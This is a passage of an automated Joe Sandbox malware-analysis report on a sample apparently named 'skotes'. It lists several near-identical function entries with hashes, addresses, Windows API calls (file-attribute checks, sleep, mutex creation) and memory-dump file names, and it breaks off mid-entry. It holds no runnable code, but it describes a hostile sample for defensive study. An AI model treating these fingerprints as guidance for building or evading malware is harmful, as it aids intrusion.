Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2y
API String ID: 396266464-1348321943
Opcode ID: 757c2e34fbc4aecce6af1f073a48d197f69ee2691b8b89c12fcd66640dc82d33
Instruction ID: 479b9d87134535ace47e67167917ec8f59b17b5933061a21a772802378d77253
Opcode Fuzzy Hash: 757c2e34fbc4aecce6af1f073a48d197f69ee2691b8b89c12fcd66640dc82d33
Instruction Fuzzy Hash: 21312831700104ABFB18DB78CD8AB5DB772DBC1314F204219E094AB3D2D73EA9808763

Function 0073A1AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0073A1B1
Sleep.KERNEL32(00000064,?), ref: 0073A963
CreateMutexA.KERNEL32(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2y
API String ID: 396266464-1348321943
Opcode ID: 675b92a1d43f7003b81c570a3a6a4830b5115d5aa94b67e8798ba3e68cc77af6
Instruction ID: ce6ec2223b3ee42c437a4bd6db6a7753a789d25b365a45be7176ce82f3da1c59
Opcode Fuzzy Hash: 675b92a1d43f7003b81c570a3a6a4830b5115d5aa94b67e8798ba3e68cc77af6
Instruction Fuzzy Hash: FF312A31B04144ABFB18DB7CDC8AB5DB772EBC6314F244219E094A73D2D77E99808762

Function 0073A2E3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 134sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0073A2E6
Sleep.KERNEL32(00000064,?), ref: 0073A963
CreateMutexA.KERNEL32(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2y
API String ID: 396266464-1348321943
Opcode ID: 5756b360c272601be6e26788aaedb04f951c82536dcc81468193a4e69e3b7c79
Instruction ID: ac6c2df5cbb16e5f2b5788939530c5c5da7a4154d066d4874c03750d50219db3
Opcode Fuzzy Hash: 5756b360c272601be6e26788aaedb04f951c82536dcc81468193a4e69e3b7c79
Instruction Fuzzy Hash: B9314A31704144ABFB18DB7CDC8A76DB772EBD2314F208219E494AB3D6D73E99808722

Function 0073A418 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0073A41B
Sleep.KERNEL32(00000064,?), ref: 0073A963
CreateMutexA.KERNEL32(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2y
API String ID: 396266464-1348321943
Opcode ID: 8d9a20b479488008c1c428d829dfd99616ffe764acb7132af6bd839dc17d24cd
Instruction ID: 9243c63ca0bf9cbcaeeecc4061a059bd6f009c228428bec11658d806e3c20adb
Opcode Fuzzy Hash: 8d9a20b479488008c1c428d829dfd99616ffe764acb7132af6bd839dc17d24cd
Instruction Fuzzy Hash: 84312931B04144ABFB189BBCDC8EB6DB761EBC1314F208219E494AB2D7D77D69808762

Function 0073A54D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0073A550
Sleep.KERNEL32(00000064,?), ref: 0073A963
CreateMutexA.KERNEL32(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2y
API String ID: 396266464-1348321943
Opcode ID: 3669f75ce405bad60e32e93213e316b861ffe08d1bbb95dd0c76049e4389a6bb
Instruction ID: e37ec0b5a643148f7436b1ae52998b90926cac074c4d8e70d6454e50165f904d
Opcode Fuzzy Hash: 3669f75ce405bad60e32e93213e316b861ffe08d1bbb95dd0c76049e4389a6bb
Instruction Fuzzy Hash: C6311831704104EBFB18DB78DC8BB6DB762EBC5314F248219E495AB2D3D73D99818722

Function 0073A682 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0073A685
Sleep.KERNEL32(00000064,?), ref: 0073A963
CreateMutexA.KERNEL32(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2y
API String ID: 396266464-1348321943
Opcode ID: 6741e600c7e953ae62f6edb72191e5b54eaf453aba9f361c85e3dbb9363da6ff
